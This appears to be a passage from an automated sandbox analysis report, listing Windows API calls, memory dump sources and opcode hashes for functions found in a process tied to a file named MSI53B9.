                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: ExecutionStateThread
                                              • String ID:
                                              • API String ID: 2211380416-0
                                              • Opcode ID: 406cdf9079d4a0d7202508cc66e8b9e9c5394cd84cf126b65700ae27d2560679
                                              • Instruction ID: e8327f303e0b1a269232d87eb2df3cb0ba65fd1d014bed6e5331bd36d596ce36
                                              • Opcode Fuzzy Hash: 406cdf9079d4a0d7202508cc66e8b9e9c5394cd84cf126b65700ae27d2560679
                                              • Instruction Fuzzy Hash: 03D0C25030461026E621332C6806BBD2907FFCB360F084035B208D26D7AA46886AA6F3
                                              APIs
                                              • GdipAlloc.GDIPLUS(00000010), ref: 00888B6B
                                                • Part of subcall function 00888924: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00888945
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: Gdip$AllocBitmapCreateFromStream
                                              • String ID:
                                              • API String ID: 1915507550-0
                                              • Opcode ID: 15c49645ae947bc9d886009c95b2f94d8af3cf3aba4b9e0e598e8e73a7603f1a
                                              • Instruction ID: cc689320b8d4c923c009300e08fd902f1db6c225bf4998a7854ecf6160313ade
                                              • Opcode Fuzzy Hash: 15c49645ae947bc9d886009c95b2f94d8af3cf3aba4b9e0e598e8e73a7603f1a
                                              • Instruction Fuzzy Hash: 25D0A77060010CFBDF607E648C0297DBAD8FB413A0F808135BC04D6150EE72DD106362
                                              APIs
                                              • GetFileType.KERNELBASE(000000FF,0087964C), ref: 00879726
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: FileType
                                              • String ID:
                                              • API String ID: 3081899298-0
                                              • Opcode ID: e467b47e7cc866369be8825c27bfadd5386ff6ff54155d9ef1b156a1838d5e15
                                              • Instruction ID: f457fc9f432bbedc32976c2d3cc1495e3bd76902f4bb49cea4bf035bf6327528
                                              • Opcode Fuzzy Hash: e467b47e7cc866369be8825c27bfadd5386ff6ff54155d9ef1b156a1838d5e15
                                              • Instruction Fuzzy Hash: 69D01230031640958E690E385D090666661FB433E6B28DAE4E0ADC40A9C722C843F541
                                              APIs
                                              • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 0088BF9C
                                                • Part of subcall function 0088991E: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0088992F
                                                • Part of subcall function 0088991E: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00889940
                                                • Part of subcall function 0088991E: TranslateMessage.USER32(?), ref: 0088994A
                                                • Part of subcall function 0088991E: DispatchMessageW.USER32(?), ref: 00889954
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: Message$DispatchItemPeekSendTranslate
                                              • String ID:
                                              • API String ID: 4142818094-0
                                              • Opcode ID: 1d49b1955a991cca5a1493271c4d238134880183a1eebc14c8b4497b589c0dc8
                                              • Instruction ID: f383032066081704e41c63885fbfb8c1c97dbfca6b4c1ca0a2ba8a8a07c910c7
                                              • Opcode Fuzzy Hash: 1d49b1955a991cca5a1493271c4d238134880183a1eebc14c8b4497b589c0dc8
                                              • Instruction Fuzzy Hash: 50D09E32144200EAD6112B55CD06F1A7AA2FB8CB04F004958B284740B186629D31EB12
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: FreeLibrary
                                              • String ID:
                                              • API String ID: 3664257935-0
                                              • Opcode ID: bcf8d655461e04c4c82b8fa4e6faf462ff56b35ad93b160324fb4fb41bf17d84
                                              • Instruction ID: 439bd4a3b751a951f2c93b1ad3bb9e679bd3e90218cbbc2fc96a7cfcfe565751
                                              • Opcode Fuzzy Hash: bcf8d655461e04c4c82b8fa4e6faf462ff56b35ad93b160324fb4fb41bf17d84
                                              • Instruction Fuzzy Hash: A1D0CA70410622CFE3B09F38E804B82BBE0FF18311B21882E90CAC2628E2708880CF40
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0088CD6E
                                                • Part of subcall function 0088CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088CB39
                                                • Part of subcall function 0088CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088CB4A
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 00dcee143811831a47eb563a91832a4a850b261b50707218225b39b15a9a9c4d
                                              • Instruction ID: 37f86bf0d8e26177d13d65e9810b5ffa8349f949cf6a379f3676164d83a0fb48
                                              • Opcode Fuzzy Hash: 00dcee143811831a47eb563a91832a4a850b261b50707218225b39b15a9a9c4d
                                              • Instruction Fuzzy Hash: EDB012C1259015FD312CB2489E02C37050CF0C2F54330446FF402D4A44A8642C06C133
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0088C799
                                                • Part of subcall function 0088CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088CB39
                                                • Part of subcall function 0088CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088CB4A
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 66ae487b981a2bf42bb058f437c009e3e1b940872bb45a3ce1d0c41dc5c46a71
                                              • Instruction ID: 3e1ee50201fae8dee9527a6f8d32069f23008f9b1741bf7bdfb7789625022e4c
                                              • Opcode Fuzzy Hash: 66ae487b981a2bf42bb058f437c009e3e1b940872bb45a3ce1d0c41dc5c46a71
                                              • Instruction Fuzzy Hash: C6B012D1258106BD318CB1481C42C37010DF0C3B24330C41FF801C0A48EAD40C5D8133
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0088C799
                                                • Part of subcall function 0088CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088CB39
                                                • Part of subcall function 0088CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088CB4A
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 4b2ca973a70a0871031e9dffbc71a363313b976c4e2038d11c6dbc87bc387cdc
                                              • Instruction ID: b679c0796fd6fd34804bed0eeb1e0cbf164a61654cc144671b772bfd66e7920b
                                              • Opcode Fuzzy Hash: 4b2ca973a70a0871031e9dffbc71a363313b976c4e2038d11c6dbc87bc387cdc
                                              • Instruction Fuzzy Hash: 05B012D1258109AD31CCF14D1C02D37010CF0C2B24330C41FF400C0B48E9E40C598337
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0088C799
                                                • Part of subcall function 0088CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088CB39
                                                • Part of subcall function 0088CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088CB4A
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 5bce15c15dd23fabbd9d2a3fc6a15f624b0be259d2b6a96d797affcc50beef8b
                                              • Instruction ID: f9dc595a1caaf7252dce3fd6dec8321e4d57c9cb096f983195a2632ebd2e3687
                                              • Opcode Fuzzy Hash: 5bce15c15dd23fabbd9d2a3fc6a15f624b0be259d2b6a96d797affcc50beef8b
                                              • Instruction Fuzzy Hash: 29B012D129C006AD318CF14C5D02D37010DF0C2B24330C41FF401C1B48E9D90C5E8233
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0088C738
                                                • Part of subcall function 0088CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088CB39
                                                • Part of subcall function 0088CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088CB4A
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 0a2d1fd84a1f7c6765b76e5d937451de3970e1aaa5307120e44c5e6bff3d2d3e
                                              • Instruction ID: 9ebd377f6b82cbf5f18bd63e572e9cc9fe22f0e905d3458b1982c86dbecc80ce
                                              • Opcode Fuzzy Hash: 0a2d1fd84a1f7c6765b76e5d937451de3970e1aaa5307120e44c5e6bff3d2d3e
                                              • Instruction Fuzzy Hash: 39B012E1268226BC350CB1D82D42D37050CF0C2B24330851FF400D4944EAA42C44CB33
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0088C738
                                                • Part of subcall function 0088CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088CB39
                                                • Part of subcall function 0088CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088CB4A
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: a540938f360854be2c62944c25788a4b2d3ba259e141603d0c97d9987bb3a06c
                                              • Instruction ID: d622cf05cd0750b5afc94d09e92fa449aca0597803bfa2c784cacfba6941f40d
                                              • Opcode Fuzzy Hash: a540938f360854be2c62944c25788a4b2d3ba259e141603d0c97d9987bb3a06c
                                              • Instruction Fuzzy Hash: A3B012D1278116AC324CF19C2D02D37054CF0C2B14330C41FF800C0A44E9941C048B33
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0088C738
                                                • Part of subcall function 0088CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088CB39
                                                • Part of subcall function 0088CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088CB4A
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 9933d15a70a45e73c601d8b437d6e280403ff547e60a0124d387388a912149af
                                              • Instruction ID: 398f5a82b641eb81ba9446629a464d0be023ac120429689315cfe4c83eea8e72
                                              • Opcode Fuzzy Hash: 9933d15a70a45e73c601d8b437d6e280403ff547e60a0124d387388a912149af
                                              • Instruction Fuzzy Hash: 39B012D1378016AC318CF19CAD02E37054CF0C2B14330851FF401C0A44E9941C048733
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0088C738
                                                • Part of subcall function 0088CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088CB39
                                                • Part of subcall function 0088CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088CB4A
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 7e7e3cf28bdba3bd67bc93f233d84f8591db2823773fe9cbfbdf75a4497bfc06
                                              • Instruction ID: 661b00c467403a5c9d429b8a6fb0d98bf4afd69e4afe6819a472290e860935fd
                                              • Opcode Fuzzy Hash: 7e7e3cf28bdba3bd67bc93f233d84f8591db2823773fe9cbfbdf75a4497bfc06
                                              • Instruction Fuzzy Hash: CDB012D1268216AD314CF19C7F02D37054CF0C2B14330841FF400C0A44F9981C058B33
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0088C738
                                                • Part of subcall function 0088CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088CB39
                                                • Part of subcall function 0088CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088CB4A
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 647b27e0694985c668f9435ef45d5e45e9e4005c05e526f217d8d8697d370c17
                                              • Instruction ID: 436b7988e164a7ec813bcd55de263cc2a5b515a7e2646b94d6b765e64bec88bc
                                              • Opcode Fuzzy Hash: 647b27e0694985c668f9435ef45d5e45e9e4005c05e526f217d8d8697d370c17
                                              • Instruction Fuzzy Hash: 10A011E22A800BBC3008B2A82C02C3B0A0CF0C2B28330880EF802C0288A8A808000A32
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0088C799
                                                • Part of subcall function 0088CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088CB39
                                                • Part of subcall function 0088CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088CB4A
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 2e4afd72fc82be199d24eeb7757ecefb9c7c3cd13b63fcd150a9a2db747c9fc0
                                              • Instruction ID: 50cec48405f5031c267507c4f1bec9fcfedb8f97deed5a77d7ae40740af1a4fb
                                              • Opcode Fuzzy Hash: 2e4afd72fc82be199d24eeb7757ecefb9c7c3cd13b63fcd150a9a2db747c9fc0
                                              • Instruction Fuzzy Hash: 86A011E22A800ABC3088B2082C02C3B020CF0C2B28330880EF802C0288A8E80CA88232
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0088C799
                                                • Part of subcall function 0088CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088CB39
                                                • Part of subcall function 0088CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088CB4A
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 90a426a2e18198e816775c6c5c51d97917f9256b174ba54c09290d10bf454bc0
                                              • Instruction ID: 50cec48405f5031c267507c4f1bec9fcfedb8f97deed5a77d7ae40740af1a4fb
                                              • Opcode Fuzzy Hash: 90a426a2e18198e816775c6c5c51d97917f9256b174ba54c09290d10bf454bc0
                                              • Instruction Fuzzy Hash: 86A011E22A800ABC3088B2082C02C3B020CF0C2B28330880EF802C0288A8E80CA88232
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0088C738
                                                • Part of subcall function 0088CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088CB39
                                                • Part of subcall function 0088CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088CB4A
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 96ed7d873b7cc10e3199be2bc1ef905cd4b25e83bccae8dcc1408f956f984024
                                              • Instruction ID: 436b7988e164a7ec813bcd55de263cc2a5b515a7e2646b94d6b765e64bec88bc
                                              • Opcode Fuzzy Hash: 96ed7d873b7cc10e3199be2bc1ef905cd4b25e83bccae8dcc1408f956f984024
                                              • Instruction Fuzzy Hash: 10A011E22A800BBC3008B2A82C02C3B0A0CF0C2B28330880EF802C0288A8A808000A32
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0088C738
                                                • Part of subcall function 0088CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088CB39
                                                • Part of subcall function 0088CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088CB4A
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
